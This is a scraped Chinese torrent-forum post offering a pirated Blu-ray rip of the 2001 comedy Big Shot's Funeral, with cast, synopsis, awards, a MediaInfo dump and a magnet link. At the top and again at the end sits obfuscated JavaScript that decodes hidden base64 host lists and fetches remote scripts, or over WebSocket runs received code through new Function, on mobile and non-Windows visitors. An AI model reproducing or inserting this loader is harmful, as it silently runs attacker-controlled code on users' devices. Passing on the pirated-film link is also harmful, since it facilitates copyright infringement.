大腕[国语配音/中文字幕].Big.Shot's.Funeral.2001.1080p.BluRay.x265.10bit.DTS 7.02GB

版主小s 1月前 168

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 大腕 / Big Shot's Funeral

◎年 代 2001

◎产 地 中国大陆 / 中国香港

◎类 别 喜剧

◎语 言 汉语普通话 / 英语

◎上映日期 2001-12-21(中国大陆)

◎IMDb链接 https://www.imdb.com/title/tt0287934/

◎豆瓣评分 7.9/10 (184400人评价)

◎豆瓣链接 https://movie.douban.com/subject/1304022/

◎片 长 103分钟

◎导 演 冯小刚 Xiaogang Feng (id:1274255)

◎编 剧 石康 Shi Kang (id:1326847)

冯小刚 Xiaogang Feng (id:1274255)

李晓明 Xiaoming Li (id:1321175)

◎演 员 葛优 You Ge (id:1000905)

关之琳 Rosamund Kwan (id:1028064)

英达 Da Ying (id:1011479)

保罗·马祖斯基 Paul Mazursky (id:1048254)

唐纳德·萨瑟兰 Donald Sutherland (id:1010556)

李诚儒 Chengru Li (id:1314331)

张涵予 Hanyu Zhang (id:1274319)

傅彪 Biao Fu (id:1030488)

刘仪伟 Yiwei Liu (id:1315726)

克里斯托弗·巴登 Christopher Barden (id:1342731)

何平 Ping He (id:1275272)

牛飘 Piao Niu (id:1323865)

杜宝宝 Paul Duke (id:1375594)

李晓耕 Xiaogeng Li (id:1375595)

许晓力 Xiaoli Xu (id:1375596)

叶宏 Hong Ye (id:1375597)

袁德旺 Dewang Yuan (id:1355257)

张晞临 Xilin Zhang (id:1314257)

杨欣 Xin Yang (id:1180718)

吉米 Jimmy (id:1404362)

徐啸力 Xiaoli Xu (id:1316281)

王宝强 Baoqiang Wang (id:1274388)

邓广埙 Guangxun Deng (id:1409697)

芮丽蓉 Lirong Rui (id:1409701)

添田武人 Soeda Takehito (id:1419781)

何平 Ping He (id:1275272)

王中磊 Zhonglei Wang (id:1276037)

王中军 Zhongjun Wang (id:1276036)

杜宝宝 Paul Duke (id:1375594)

陆国强 Guoqiang Lu (id:1398246)

三宝 Bao San (id:1296601)

张黎 Li Zhang (id:1301692)

周影 Ying Zhou (id:1301713)

刘心刚 Xingang Liu (id:1274643)

赵楠 Nan Zhao (id:1325307)

◎标 签 冯小刚 / 喜剧 / 葛优 / 中国电影 / 中国 / 大陆 / 黑色幽默 / 搞笑

◎简 介

尤优(葛优饰)接到个美差,拍一部宣传记录片记录好莱坞大腕导演泰勒(唐纳德?萨瑟兰饰)在中国拍摄影片的工作过程。一开始工作顺利,但随着制片人托尼(保罗?莫索尔斯基饰)的到来,事情起了变化。闲下来的尤优和泰勒、泰勒的助手露茜(关之琳饰)到寺庙游览,三人相处得非常愉快。不料几天后泰勒因心脏病发作,生命垂危,他希望尤优能为自己操办个喜丧葬礼,尤优揽下活儿。

尤优找到老同学王小柱(英达饰),泰勒将死对王来说是一个难得商机,对托尼来说也是如此,惟有尤优和露茜是怀着朴实感情面对此事。王小柱开始出谋献策,拉了好多赞助,众多商家不惜花大钱在葬礼上做广告。局面变得无法收拾,却不料,在葬礼的背后另有玄机。

◎获奖情况 (共9项)

第22届香港电影金像奖 (2003)

最佳亚洲电影(提名)

第25届大众电影百花奖 (2002)

最佳故事片

最佳男演员

└──葛优 (id:1000905)

最佳男配角

└──英达 (id:1011479)

第2届华语电影传媒大奖 (2002)

最佳男演员

└──葛优 (id:1000905)

最佳电影(提名)

最佳导演(提名)

└──冯小刚 (id:1274255)

第9届北京大学生电影节 (2002)

最佳观赏效果奖

最受大学生欢迎男演员

└──葛优 (id:1000905)

 1. ##### MediaInfo ######

 2. General

 3. Unique ID : 258925023355854113140579870022728754179 (0xC2CB2544F1226718D854D1C7FDF52403)

 4. Complete name : Big.Shot'[email protected]

 5. Format : Matroska

 6. Format version : Version 4

 7. File size : 7.02 GiB

 8. Duration : 1 h 47 min

 9. Overall bit rate : 9 388 kb/s

 10. Movie name : Big Shot's Funeral - Blu-ray?

 11. Encoded date : UTC 2021-10-23 07:16:33

 12. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

 13. Writing library : libebml v1.4.2 + libmatroska v1.6.4

 14. Cover : Yes

 15. Attachments : cover.jpg


 16. Video

 17. ID : 1

 18. Format : HEVC

 19. Format/Info : High Efficiency Video Coding

 20. Format profile : Main [email protected]@Main

 21. Codec ID : V_MPEGH/ISO/HEVC

 22. Duration : 1 h 47 min

 23. Bit rate : 7 839 kb/s

 24. Width : 1 918 pixels

 25. Height : 1 036 pixels

 26. Display aspect ratio : 1.85:1

 27. Frame rate mode : Constant

 28. Frame rate : 24.000 FPS

 29. Color space : YUV

 30. Chroma subsampling : 4:2:0

 31. Bit depth : 10 bits

 32. Bits/(Pixel*Frame) : 0.164

 33. Stream size : 5.86 GiB (84%)

 34. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

 35. Encoding settings : rc=crf / crf=15.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1918x1036 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

 36. Default : Yes

 37. Forced : No


 38. Audio

 39. ID : 2

 40. ID in the original source medium : 4352 (0x1100)

 41. Format : DTS

 42. Format/Info : Digital Theater Systems

 43. Codec ID : A_DTS

 44. Duration : 1 h 47 min

 45. Bit rate mode : Constant

 46. Bit rate : 1 509 kb/s

 47. Channel(s) : 6 channels

 48. Channel layout : C L R Ls Rs LFE

 49. Sampling rate : 48.0 kHz

 50. Frame rate : 93.750 FPS (512 SPF)

 51. Bit depth : 24 bits

 52. Compression mode : Lossy

 53. Stream size : 1.13 GiB (16%)

 54. Language : Chinese

 55. Default : Yes

 56. Forced : No

 57. Original source medium : Blu-ray


 58. Text #1

 59. ID : 3

 60. ID in the original source medium : 4608 (0x1200)

 61. Format : PGS

 62. Muxing mode : zlib

 63. Codec ID : S_HDMV/PGS

 64. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

 65. Duration : 1 h 44 min

 66. Bit rate : 35.0 kb/s

 67. Count of elements : 2423

 68. Stream size : 26.1 MiB (0%)

 69. Title : chs

 70. Language : Chinese

 71. Default : Yes

 72. Forced : No

 73. Original source medium : Blu-ray


 74. Text #2

 75. ID : 4

 76. ID in the original source medium : 4609 (0x1201)

 77. Format : PGS

 78. Muxing mode : zlib

 79. Codec ID : S_HDMV/PGS

 80. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

 81. Duration : 1 h 44 min

 82. Bit rate : 42.1 kb/s

 83. Count of elements : 2178

 84. Stream size : 31.3 MiB (0%)

 85. Title : eng

 86. Language : English

 87. Default : No

 88. Forced : No

 89. Original source medium : Blu-ray


 90. Menu

 91. 00:00:00.000 : en:Chapter 01

 92. 00:11:53.375 : en:Chapter 02

 93. 00:19:52.166 : en:Chapter 03

 94. 00:32:18.041 : en:Chapter 04

 95. 00:48:02.791 : en:Chapter 05

 96. 00:58:35.333 : en:Chapter 06

 97. 01:08:53.250 : en:Chapter 07

 98. 01:15:41.541 : en:Chapter 08

 99. 01:23:06.541 : en:Chapter 09

 100. 01:30:48.375 : en:Chapter 10

 101. 01:39:22.916 : en:Chapter 11

 102. 01:44:59.208 : en:Chapter 12


TAGS 喜剧

磁力链:
 • magnet:?xt=urn:btih:6C640558ECD55557694ADA7FF55FF661C859B509

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};